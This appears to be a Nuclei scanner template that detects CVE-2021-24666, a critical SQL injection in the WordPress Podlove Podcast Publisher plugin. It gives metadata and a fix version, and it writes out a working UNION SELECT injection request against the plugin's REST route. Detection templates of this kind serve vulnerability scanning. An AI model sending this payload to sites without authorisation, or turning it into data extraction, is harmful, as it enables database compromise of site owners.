id: CVE-2021-24666 info: name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection author: theamanrawat severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/ - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76 - https://nvd.nist.gov/vuln/detail/CVE-2021-24666 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 epss-score: 0.23542 epss-percentile: 0.96047 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: podlove product: podlove_podcast_publisher framework: wordpress tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve http: - method: GET path: - "{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-" matchers-condition: and matchers: - type: word part: body words: - '66a82937a7660b73b00d4f7cefee6c85' - '"service_id"' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 490a0046304402203fe19a7fc71d10ee97d7bd35e162fe6668e174ad67491045c0d7282e85cf65e002204eccce09a7083012a3862e74eba34a68e4c64cc04c90df814badc4c7bec98480:922c64590222798bb761d5b6d8e72950